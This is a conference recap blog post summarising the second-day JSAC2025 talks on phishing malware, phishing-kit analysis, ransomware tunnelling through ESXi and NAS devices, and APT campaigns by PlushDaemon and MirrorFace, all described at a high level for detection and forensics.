JSAC2025 -Day 2-
Continuing from the previous blog article, this entry introduces the presentations on the 2nd day of JSAC2025.
Observation of phishing criminal groups related to illegal money transfers and Mizuho Bank’s countermeasures -Fighting against phishing site malware ‘KeepSpy’-
Speaker: Tsukasa Takeuchi, Takuya Endo, Hiroyuki Yako (Mizuho Financial Group)
Slides(English)
Tsukasa, Takuya, and Hiroyuki presented Mizuho’s efforts to address phishing attacks, including the analysis of exploited malware and the criminal groups behind them, as well as internal organizational collaboration to counter such threats.
They first discussed the current state of damages from phishing attacks in Japan as well as the costs associated with responding to such incidents, and then they argued the importance of containing phishing as a criminal activity. They then detailed the characteristics of phishing sites they have identified and TTPs classification of them, focusing particularly on the groups that conduct smishing and their attack methods.
In addition, they explained the details of KeepSpy, Android malware which spreads links to phishing sites through smishing. Their analysis revealed the functionality of the malware and how it executes commands received from its C2 server to distribute phishing site URLs via SMS. The speakers said that their findings would enable them to detect and swiftly takedown phishing sites, through identifying the functionality related to phishing attacks and profiling criminal groups.
They also discussed how CT logs can be used for early detection, based on the statistics on targeted brands and their analysis on server certificates of phishing sites. Furthermore, they shared their efforts towards automation, describing the collaborative process in Mizuho for implementation and future improvements, as well as the actual workflow.
In conclusion, the speakers shared their future plans, focusing on expanding and optimizing the early detection systems. They also emphasized that not only information sharing but also collaborative protection strategies with other organizations are necessary to combat phishing attacks.
Rapidly Changing Trends in Phishing -Sharing real-time phishing site detection systems-
Speaker: Ryosuke Yoshimura, Tomoya Sano (LAC)
Slides(English)
Ryosuke and Tomoya presented on a system designed to detect phishing sites in real-time to address the current situation surrounding phishing attacks.
They first explained the growing trend of phishing, citing the increasing number of credit card information thefts and unauthorized Internet banking transfers over the years. They also highlighted that phishing attacks tend to exploit major brands or events that attract significant public attention, leading to rapid changes in attack trends. Additionally, they pointed out that phishing methods are rapidly evolving along with technical changes such as free SSL certificates services and the adoption of DMARC.
The speakers introduced a system to detect phishing sites in real-time to address such situation these days and explained its details. The system uses its unique extraction logic to identify potential phishing domains at an early stage. The speakers provided actual case studies where they identified and analyzed phishing sites distributing malware, and the methods used in the attack was explained.
In conclusion, the speakers discussed their future challenges. Acknowledging the fact that the system’s extraction logic sometimes detects phishing sites before they are fully established due to the certificate data included, they expressed their intention to continue developing the system to address the issue.
Analysis of Two Phishers : Like a doppelganger
Speaker: Masaomi Masumoto (NTT Communications)
Slides(English)
Masaomi presented the results and insights from analyzing two Phishing-as-a-Service (PhaaS) phishing kits. He also shared how detection rules can be created using Indicators of Kit (IOK) and how they can be effectively used.
He first focused on the two PhaaS services, highlighting the similarities between the promotional videos shared within the attacker community and the timing of community posts and other activities. He also pointed out that both phishing kits targeted Japan and used the same management panel tools. After that, he discussed the files and features included in both phishing kits. The Case 1 phishing kit contained multiple JavaScript files as well as distinct data theft and cloaking processes. While the Case 2 phishing kit is similar in its structure and processes, new features such as IP address counting and data addition were confirmed. He pointed out that the IP address-related feature was also identified in the phishing kit used by the attack group Chenlun, and comparing these phishing kits, he discussed the similarities in the code, processing methods, and execution.
Furthermore, the speaker explained how phishing sites can be easily established using phishing kits. Docker can be used to efficiently set up the required environment, and domains and target brands can be easily configured through scripts. Based on these findings, he discussed how to create detection rules using IOK and expressed his hope that the presentation would contribute to further understanding of phishing attacks.
Active Monitoring and Response to User Credential Leaks
Speaker: Yuji Ino, Mitsuki Yoshikawa (Recruit Technologies)
*The presentation is only available at the conference.
Ransomware’s Secret Tunnel: How Ransomware Groups Hijack ESXi and NAS for Covert Operations
Speaker: Zhongyuan Hau, Ren Jie Yow (Sygnia)
Slides(English)
Zhongyuan and Ren Jie presented their findings on a new attack technique by ransomware groups to bypass security products’ detection. With a detailed demonstration, they explained how attackers exploit network configurations and credentials of ESXi and NAS to avoid detection through tunneling.
First, they pointed out that despite NAS and ESXi are frequent targets of ransomware attacks due to their critical importance within systems, they are often under-monitored by EDR systems and can have long operational lifespans, making them more vulnerable to being exploited for backdoor access. In one case involving a NAS device, attackers used a stolen credential to login to the web-based NAS management system, activated SSH, and exploited the system for backdoor. Similarly, in another case involving ESXi, after gaining unauthorized access, attackers activated SSH, disabled firewalls, and used SSH port forwarding to further exploit the system.
Additionally, the speakers discussed the forensic investigation process for addressing such attacks. Since these attacks often avoid detection by EDR systems, investigators need to focus on reviewing command execution histories on the affected devices. For NAS devices, it is essential to closely review the logs of SSH authentication, access, devices, and command execution, as well as checking timestamps for backdoors. For ESXi investigations, it is important to focus on the logs of ESXi, application, and SSH history. The speakers introduced the specific actions by attackers that leave traces, as well as the files in which such traces can be found.
Finally, they emphasized the importance of monitoring NAS and ESXi devices thoroughly and the value of storing system logs to protect against such attacks. They concluded by reiterating the danger posed by the stealth and persistence of these attacks and asked organizations to implement robust countermeasures to protect their systems.
From Service Providers to Customers: Earth Ammit Tailored Cyber Assault on Target’s Supply Chain
Speaker: Pierre Lee, Philip Chen, Vickie Su (Trend Micro)
*The presentation is only available at the conference.
China-aligned PlushDaemon APT compromises supply chain of Korean VPN
Speaker: Facundo Munoz (ESET)
Slides(English)
Facundo presented about the activities of PlushDaemon attack group and the details of its attacks. Active since 2019, the group is known for its distinctive attack methods, including supply chain compromises, and the speaker discussed it in detail.
In incidents believed to be linked to PlushDaemon, attackers compromised the legitimate website of a VPN solution provider and used it to distribute Trojan malware disguised as software setup files. These downloaded files included suspicious DLL files in addition to the legitimate ones, which allows the installation of the SlowStepper backdoor along with the regular software. The speaker noted that this TTP shows similarities with the backdoor NSPX30 used by the attack actor Blackwood, on which he presented at JSAC in the previous year. He also shared his analysis of SlowStepper, detailing its various versions, a variety of toolkits, and its functionality.
Furthermore, he discussed other AitM attack cases by PlushDaemon, including incidents where the downloader LittleDaemon was used. Noting that a number of applications made in China were exploited in these attacks, he suggested the possibility that attackers used DNS poisoning to redirect software update requests to malicious servers.
In conclusion, the speaker underscored the complexity, multi-functional nature, and resourcefulness of PlushDaemon’s attack methods, warning that their willingness to engage in supply chain attacks in spite of high-risk of tool detection makes them a serious threat.
Operation AkaiRyu: MirrorFace invites Europe to EXPO 2025 and revives ANEL backdoor
Speaker: Dominik Breitenbacher (ESET)
Slides(English)
Dominik presented the details on his analysis on Operation AkaiRyu attack campaign conducted by the APT group MirrorFace.
Operation AkaiRyu has been targeting diplomatic institutions in Central Europe since August 2024. In its initial penetration phase, the attackers send emails related to the 2025 World Expo in Japan to the targets. If they reply to the email, the second email include a link to a file-sharing service containing a suspicious file. When the targets download the ZIP file and unzip it, they find a .lnk file, and by executing it, it runs and deploys multiple files. The speaker found this process ultimately leads to the decryption and execution of ANEL malware.
The speaker further explained on the post-penetration activities, noting that MirrorFace selects specific tools based on the compromised device. For example, on a project coordinator’s device, the goal was to steal personal information, while on an employee’s device, the attackers aimed to gain access to the system and laterally move within the network. The speaker also provided details on the deployed tools, including the commands and versions of ANEL, as well as the functionality of NOOPDOOR, a loader deployed in the later stages of the attack, and the customized AsyncRAT.
Lastly, the speaker discussed the potential connection between APT10 and MirrorFace, highlighting similarities in their targets. He pointed out that MirrorFace’s use of the ANEL malware, which was previously used by APT10, suggests that they may be a subgroup of APT10.
Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts
Speaker: Yusuke Niwa, Satoshi Kamekawa, Shuhei Sasada (Itochu Cyber & Intelligence)
Slides(English)
Satoshi and Yusuke presented on their analysis of MirrorFace’s attack campaign that leveraged Windows Sandbox. They clarified the attack methods through the signs of compromise, and based on the results of their investigation, they shared effective countermeasures and forensic techniques.
First, the speakers described the structure of Windows Sandbox and then explained how the campaign exploited WSB files. They also discussed that the recent Windows updates that introduced new CLI commands for Windows Sandbox makes it possible to avoid execution of a WSB file, pointing out that it potentially reduces the traceability of attacks when exploited.
Based on these findings, the speakers suggested the need for separate responses on both the host side and the sandbox side, providing detailed explanation on how to conduct investigations and monitoring for each. On the host side, it is necessary to monitor distinctive processes, memory usage, and event logs, and the speakers shared specific process names to be prioritized for monitoring. On the sandbox side, they explained that vmmem can be used to detect traces of malicious tools, and that Yara rules can also be employed for detection. They also shared useful artifacts on both the host and sandbox sides when conducting forensic investigations and discussed effective countermeasures against the attack.
Based on the observed cases, the speakers emphasized that when monitoring with EDR or similar tools is challenging, it is crucial to implement proactive measures such as strengthened monitoring and comprehensive investigations to minimize risks. They also highlighted the potential risk that system updates designed to improve user convenience could unintentionally benefit attackers.
In Closing
In this article, I introduced the presentations on the second day of JSAC 2025. The next entry will feature the Workshops and Lightning Talks.
